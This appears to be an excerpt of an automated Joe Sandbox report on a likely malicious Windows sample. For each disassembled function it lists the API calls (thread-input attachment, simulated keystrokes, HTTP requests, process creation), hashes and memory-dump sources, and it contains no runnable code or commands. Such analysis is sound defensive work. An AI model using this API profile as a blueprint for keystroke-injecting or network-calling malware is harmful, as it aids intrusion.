                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ArraySafeVartype
                                                            • String ID:
                                                            • API String ID: 1725837607-0
                                                            • Opcode ID: 476706288c7c289195b222e63b378537514354d47626623744708df23c913896
                                                            • Instruction ID: 5e70cea0b7f310c10b2d25087ac6c8e67e51a2b96c202122020d38f3a3245883
                                                            • Opcode Fuzzy Hash: 476706288c7c289195b222e63b378537514354d47626623744708df23c913896
                                                            • Instruction Fuzzy Hash: F4B18CB590460A9FDB20DFA4C885BBEB7B4FF09321F244429EA41EB251D734E941DBB1
                                                            Function 00D311CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00D311F0
                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00D30268,?,00000001), ref: 00D31204
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00D3120B
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D30268,?,00000001), ref: 00D3121A
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D3122C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D30268,?,00000001), ref: 00D31245
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D30268,?,00000001), ref: 00D31257
                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00D30268,?,00000001), ref: 00D3129C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00D30268,?,00000001), ref: 00D312B1
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00D30268,?,00000001), ref: 00D312BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                            • String ID:
                                                            • API String ID: 2156557900-0
                                                            • Opcode ID: b518497c64e9a0c809bb67fd405f8e198e8b80dc46858c7b7e8323b7d9e7d6aa
                                                            • Instruction ID: 7acca471e60e0a9fb976388180c176134ebf4074a271634e81d4d2e024469b37
                                                            • Opcode Fuzzy Hash: b518497c64e9a0c809bb67fd405f8e198e8b80dc46858c7b7e8323b7d9e7d6aa
                                                            • Instruction Fuzzy Hash: 4C31897D600305AFDB209F64EC8AFAA77A9AF54312F148126FD10CA2A0D7B4DD408B74
                                                            Function 00CDFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00CDFAA6
                                                            • OleUninitialize.OLE32(?,00000000), ref: 00CDFB45
                                                            • UnregisterHotKey.USER32(?), ref: 00CDFC9C
                                                            • DestroyWindow.USER32(?), ref: 00D145D6
                                                            • FreeLibrary.KERNEL32(?), ref: 00D1463B
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D14668
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 469580280-3243417748
                                                            • Opcode ID: 637e1cb1baece243f2695802d94bee35385b2ce53687f38a8a8b37ce99c396e4
                                                            • Instruction ID: d1ad4117b594003087ce8541930155ffe42beed04a0253a3da5b37f866cdb3da
                                                            • Opcode Fuzzy Hash: 637e1cb1baece243f2695802d94bee35385b2ce53687f38a8a8b37ce99c396e4
                                                            • Instruction Fuzzy Hash: 2FA159307012129FCB29EF15D5A4AA9F364BF05704F1442AEE90AAB362DF30AD56DF60
                                                            Function 00D2A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnumChildWindows.USER32(?,00D2A439), ref: 00D2A377
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ChildEnumWindows
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 3555792229-1603158881
                                                            • Opcode ID: 58569e9146d72704003c7d39a7ef8561dd596d03c0b8754c514869c86ba6b4e8
                                                            • Instruction ID: c3311fc1c92a0e3be9bba92aaa9636a36d566ab911e7d3d86b405f2b50e7b840
                                                            • Opcode Fuzzy Hash: 58569e9146d72704003c7d39a7ef8561dd596d03c0b8754c514869c86ba6b4e8
                                                            • Instruction Fuzzy Hash: 12912830600619EBCB08EFA8D441BEDFB74FF14308F549119E959A7241DF31A999EBB1
                                                            Function 00D5B351 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 199windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindow.USER32(01406658), ref: 00D5B3EB
                                                            • IsWindowEnabled.USER32(01406658), ref: 00D5B3F7
                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00D5B4DB
                                                            • SendMessageW.USER32(01406658,000000B0,?,?), ref: 00D5B512
                                                            • IsDlgButtonChecked.USER32(?,?), ref: 00D5B54F
                                                            • GetWindowLongW.USER32(01406658,000000EC), ref: 00D5B571
                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00D5B589
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                            • String ID: @U=u
                                                            • API String ID: 4072528602-2594219639
                                                            • Opcode ID: d91c5379eb9e98834556bc83d54bd4613bfe4b5f3d14dd3c4ee70b72f1075fa5
                                                            • Instruction ID: 0c2f90ea21e2c19e81a335d2e12ac42d19b89c4252fc2e3e54bab08dda4aedec
                                                            • Opcode Fuzzy Hash: d91c5379eb9e98834556bc83d54bd4613bfe4b5f3d14dd3c4ee70b72f1075fa5
                                                            • Instruction Fuzzy Hash: CE717C34604304AFEF359F54C894FBABBA5EF19322F18406AED45973A2C731A948DB70
                                                            Function 00D56D80 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00D56E24
                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00D56E38
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00D56E52
                                                            • _wcscat.LIBCMT ref: 00D56EAD
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00D56EC4
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00D56EF2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat
                                                            • String ID: @U=u$SysListView32
                                                            • API String ID: 307300125-1908207174
                                                            • Opcode ID: c5fdfce1a98adba125b3ae09adaff07c75cc9ee207660dee316a70e0111238ad
                                                            • Instruction ID: e920da228ef140421e92f6693832cfa63a9894a459204e828136f42a3ee47b23
                                                            • Opcode Fuzzy Hash: c5fdfce1a98adba125b3ae09adaff07c75cc9ee207660dee316a70e0111238ad
                                                            • Instruction Fuzzy Hash: 63418174A00348ABDF219FA4CC85BEA77B8EF08351F54482AFD85E7291D671DD888B70
                                                            Function 00D41A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00D41A50
                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00D41A7C
                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00D41ABE
                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00D41AD3
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D41AE0
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00D41B10
                                                            • InternetCloseHandle.WININET(00000000), ref: 00D41B57
                                                              • Part of subcall function 00D42483: GetLastError.KERNEL32(?,?,00D41817,00000000,00000000,00000001), ref: 00D42498
                                                              • Part of subcall function 00D42483: SetEvent.KERNEL32(?,?,00D41817,00000000,00000000,00000001), ref: 00D424AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                            • String ID:
                                                            • API String ID: 2603140658-3916222277
                                                            • Opcode ID: 671a69ab83786b86609e9bf2c9892e488707b1fc56c27ca5f699422840c19e8c
                                                            • Instruction ID: a9bd2e962a950e2e337fa11ff7d66d1c66655dd24cd0ddc8781083d2f2ce70cb
                                                            • Opcode Fuzzy Hash: 671a69ab83786b86609e9bf2c9892e488707b1fc56c27ca5f699422840c19e8c
                                                            • Instruction Fuzzy Hash: D0417EB5501218BFEB119F50CC85FBB7BACEF09355F044126FD059A241E7709E849BB0
                                                            Function 00D562CD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00D562EC
                                                            • GetWindowLongW.USER32(01406658,000000F0), ref: 00D5631F
                                                            • GetWindowLongW.USER32(01406658,000000F0), ref: 00D56354
                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00D56386
                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00D563B0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00D563C1
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00D563DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 2178440468-2594219639
                                                            • Opcode ID: aa79335697b385056d6642ea6c2b36cd7d3bb2a1b4163d72eaf86183a9fbaff8
                                                            • Instruction ID: b1d1fce8e73b51d5ac3de7e8cd560b2d43274d33a2bc619489cf61c1722feddf
                                                            • Opcode Fuzzy Hash: aa79335697b385056d6642ea6c2b36cd7d3bb2a1b4163d72eaf86183a9fbaff8
                                                            • Instruction Fuzzy Hash: 1931EE30644250AFEB218F18EC84F5537E1BB4A756F5901A5FD51CF2B6CB61E8489B60
                                                            Function 00D48C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00D5F910), ref: 00D48D28
                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00D5F910), ref: 00D48D5C
                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00D48ED6
                                                            • SysFreeString.OLEAUT32(?), ref: 00D48F00
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                            • String ID:
                                                            • API String ID: 560350794-0
                                                            • Opcode ID: a4432d11bacd7a6a2ccd7df92b993b44645df5b08f2f405e9fc6a97b7e238c87
                                                            • Instruction ID: 6dc3ff425c6d52772bdc11dd2f0db5b88375f5fc50f5d8748840fcf16eda8bd3
                                                            • Opcode Fuzzy Hash: a4432d11bacd7a6a2ccd7df92b993b44645df5b08f2f405e9fc6a97b7e238c87
                                                            • Instruction Fuzzy Hash: 78F14971A00209EFCF14DF94C884EAEB7B9FF49355F1484A8F905AB251DB31AE46DB60
                                                            Function 00D4F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D4F6B5
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00D4F848
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00D4F86C
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00D4F8AC
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00D4F8CE
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D4FA4A
                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00D4FA7C
                                                            • CloseHandle.KERNEL32(?), ref: 00D4FAAB
                                                            • CloseHandle.KERNEL32(?), ref: 00D4FB22
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                            • String ID:
                                                            • API String ID: 4090791747-0
                                                            • Opcode ID: 519c698549b88ba2ed1a44afee1aec7ea76b91b2eba4e892a1cb0c762d93a3af
                                                            • Instruction ID: 89392545dd963d15b3a8468d0e14e975323d52af10884d2df5a0b227c8d5ed92
                                                            • Opcode Fuzzy Hash: 519c698549b88ba2ed1a44afee1aec7ea76b91b2eba4e892a1cb0c762d93a3af
                                                            • Instruction Fuzzy Hash: F0E1AF316043409FDB14EF24C881B6ABBE1EF85314F18856DF9999B3A2CB31EC45DB62
                                                            Function 00D34CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D3466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D33697,?), ref: 00D3468B
                                                              • Part of subcall function 00D3466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D33697,?), ref: 00D346A4
                                                              • Part of subcall function 00D34A31: GetFileAttributesW.KERNEL32(?,00D3370B), ref: 00D34A32
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00D34D40
                                                            • _wcscmp.LIBCMT ref: 00D34D5A
                                                            • MoveFileW.KERNEL32(?,?), ref: 00D34D75
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                            • String ID:
                                                            • API String ID: 793581249-0
                                                            • Opcode ID: da679ee564d97974add92c739568d1ebc5587835b35bff6ccd331efd662eb4fd
                                                            • Instruction ID: 9f907f5185998ca5915f66a1fee356f4509061a7eece7e31d471460f55c76bb4
                                                            • Opcode Fuzzy Hash: da679ee564d97974add92c739568d1ebc5587835b35bff6ccd331efd662eb4fd
                                                            • Instruction Fuzzy Hash: 6A513FB20083859BC764DBA4D8919EBB3ECEF84350F04092EB689D3151EE35E688C776
                                                            Function 00D2966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D2A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D2A84C
                                                              • Part of subcall function 00D2A82C: GetCurrentThreadId.KERNEL32 ref: 00D2A853
                                                              • Part of subcall function 00D2A82C: AttachThreadInput.USER32(00000000,?,00D29683,?,00000001), ref: 00D2A85A
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D2968E
                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00D296AB
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00D296AE
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D296B7
                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00D296D5
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00D296D8
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D296E1
                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00D296F8
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00D296FB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                            • String ID:
                                                            • API String ID: 2014098862-0
                                                            • Opcode ID: 950f1ffc56c1f90be087878cf6b0f43e42193b1dd967ccc10ae6139216b3ecde
                                                            • Instruction ID: afd6bb8a9059cf90f93e1636b9325d02293273b5f403bdbdd76e50c8e19ea280
                                                            • Opcode Fuzzy Hash: 950f1ffc56c1f90be087878cf6b0f43e42193b1dd967ccc10ae6139216b3ecde
                                                            • Instruction Fuzzy Hash: A711CEB1910718BFF6106B64AC89F6A7A6DEB5C756F100425F684AB1A0C9F25C109AB4
                                                            Function 00D28921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00D2853C,00000B00,?,?), ref: 00D2892A
                                                            • HeapAlloc.KERNEL32(00000000,?,00D2853C,00000B00,?,?), ref: 00D28931
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D2853C,00000B00,?,?), ref: 00D28946
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00D2853C,00000B00,?,?), ref: 00D2894E
                                                            • DuplicateHandle.KERNEL32(00000000,?,00D2853C,00000B00,?,?), ref: 00D28951
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00D2853C,00000B00,?,?), ref: 00D28961
                                                            • GetCurrentProcess.KERNEL32(00D2853C,00000000,?,00D2853C,00000B00,?,?), ref: 00D28969
                                                            • DuplicateHandle.KERNEL32(00000000,?,00D2853C,00000B00,?,?), ref: 00D2896C
                                                            • CreateThread.KERNEL32(00000000,00000000,00D28992,00000000,00000000,00000000), ref: 00D28986
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: 67cc120143f7c0cb50d39fe677262576a4f4ed3e1e28fffdde2c2fe443bc62ec
                                                            • Instruction ID: 08b4546e23cc8f07df91c328ab713c83078319b35c5c7661089e5fd05ebcd094
                                                            • Opcode Fuzzy Hash: 67cc120143f7c0cb50d39fe677262576a4f4ed3e1e28fffdde2c2fe443bc62ec
                                                            • Instruction Fuzzy Hash: 4901A8B5240708FFE710ABA5DC49F6B3BACEB89711F408421FA15DB2A1CA7098008A31
                                                            Function 00D49B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                            • API String ID: 0-572801152
                                                            • Opcode ID: 11e717deef3d7dc59c5358ed0448c1db917a4eab86fe26861a94aa6682564f32
                                                            • Instruction ID: 0a9340a10ee727b0a353ee153336ba6e8174e2fb5bb84b47c3eeb0ccfa8d3882
                                                            • Opcode Fuzzy Hash: 11e717deef3d7dc59c5358ed0448c1db917a4eab86fe26861a94aa6682564f32
                                                            • Instruction Fuzzy Hash: CDC17E71A0021A9BDF10DFA9D894AAFB7F5FB48314F148469F945AB280E770ED45CBB0
